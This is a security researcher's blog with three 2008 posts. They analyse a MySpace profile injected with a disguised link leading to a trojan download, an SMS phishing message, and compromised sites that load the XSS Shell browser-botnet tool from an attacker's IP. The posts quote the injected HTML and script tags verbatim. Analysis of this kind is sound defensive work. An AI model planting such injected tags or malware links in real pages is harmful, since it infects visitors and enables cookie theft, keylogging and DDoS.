marco
blog
Menu:
MySpace hack
May 22, 2008
After hearing all kinds of stories about bad security at MySpace, I finally found a hacked profile. The profile, cyn7777, has now been cleaned up, so some parts of what follows will not work anymore.
The key of the attack were the following lines that were inserted in the profile's main page:
<a href="http://www.msplinks.com/MDFodHRwOi8vY29tLmNvbS9yZWRpcj9lZEl
kPTMmZGVzdFVybD1mdHA6Ly9taWNyb3NvZnBjZW50ZXI3MS5jbi9LQjg5MDgzMS5leG
U="><img
src="http://img341.imageshared.cn/.." style="position:absolute;
left:0px; top: 0px;" border="0"></a>
The code loaded an image similar to the following one and superimposed it to the page's contents. The actual image had 990x990 dimensions and transparent background, so, at first sight, the figure could be taken for a system's window: a classic picture-in-picture attack.
Clicking anywhere on most of the page caused the browser to visit the
base64-looking URL on msplinks.com. It turns out
that back in April 2007 MySpace started to convert certain links to
redirects through the msplinks.com site (check out the source of its
index page :-)). The goal? "To easily turn off links to spam, phishing,
or virus sites".
It looks like that didn't work too well... In fact, the link on
msplinks.com (still) redirects to
http://com.com/redir?edId=3&destUrl=ftp://microsofpcenter71.cn/KB890831.exe, which redirects tohttp://www.cnet.com/redir?edId=3&destUrl=ftp://microsofpcenter71.cn/KB890831.exe, which redirects tohttp://dw.com.com/redir?edId=3&destUrl=ftp://microsofpcenter71.cn/KB890831.exe, which redirects tohttp://dw.com.com/redir/redx/?edId=3&destUrl=ftp://microsofpcenter71.cn/KB890831.exe, which, finally, redirects toftp://microsofpcenter71.cn/KB890831.exe
(Incidentally, nice open redirector, cnet.com!)
The ftp site is still active and serves a bunch of exe files (all
identical, except for their names). It seems the files have been changed
in the last few days, probaby to evade detection from anti-virus tools.
In any case, VirusTotal
recognizes the old and the new version as some
form of trojan/downloader. According
to
anubis, among other
things, the binaries launch Internet Explorer and visit
http://mycashloads.com/newuser.php?saff=373.0, which, however,
redirects to yahoo.com.
Phish by SMS
May 16, 2008
And when you thought you knew all the tricks to detect phishing sites, had installed all the anti-phish browser plugins, and had developed a bunch of heuristics to identify phishing e-mails at first sight, they change the medium.
This morning I received the following SMS from 1010100001:
FRM:security@rabobankamerica.com
SUBJ:ALERT
MSG:Your Rabobank America account is closed due to unusual activity,
call us now at 8603830711.
Besides the obviously bogus source number, the fact that I don't have an account at Rabobank America was sort of a give away... The phone number turned out to be already disconnected, but I suspect I would have found a voice message asking for my credentials and other confidential information.
I think this is an interesting development. First, we are certainly less experienced at considering SMS content as suspicious. If you receive SMSs only from friends (and possibly the annoying advertisements from your carrier), you may think SMSs are trustworthy by default. Second, on cell phones, we may have less possibilities to check the authenticity of received messages: my (admittedly, very cheap and unsophisticated) phone has no anti-phish SMS plugin and no browser.
From the attacker's point of view, it would be interesting to see how they are paying for sending the messages. Compromised accounts on an SMS-sending web site? Stolen credit card? Other suggestions?
Phished and botted
May 11, 2008
It's not uncommon for attackers to exploit a vulnerable web server and use it for several different purposes: maximization of the return on investment, some might say. Case in point are three recent entries in PhishTank (439391, 439479, and 442568).
As the PhishTank reference says, these sites were used to host phishing pages. Nothing special here: the usual replicas of banking and governmental web sites. More interestingly, all the legitimate HTML pages on the sites were modified to include the following script tag:
<script src="http://216.214.109.45/private/xxx/xssshell.asp?v=336699"></script>
This code fetches a copy of the XSS Shell, a tool that essentially transforms the browser into a bot, controllable by the attacker through cross-site scripting (XSS) mechanisms. The tool, published at the end of 2006 as a proof-of-concept of XSS, comes with a useful set of predefined commands (e.g., start keylogging, get internal IP, launch DoS attack), is prepackaged with a nice administration interface, and has extensive documentation.
It turns out that the attacker hasn't fully read the xssshell instructions, in particular the part on installing the back-end database outside of the document root, with the effect that the database is publicly accessible... The database contains information about the victims of the tool and a log of the attacker's commands. After opening the database, a MS Access file readable with the MDB Tools, it is possible to reconstruct some of the attacker's activity.
Here are the highlights:
- It appears that the attack has been active since April 22.
- At the moment of writing, it has involved 9333 distinct IP addresses, or about 490 different IPs per day.
- The attacker seems to have quite a varied set of interests: he/she stole at least 60 cookies, eavesdropped on 50 or so pages being viewed by the victims, launched about 20 times the keylogging procedure, and experimented for over 400 times with the DDoS feature.
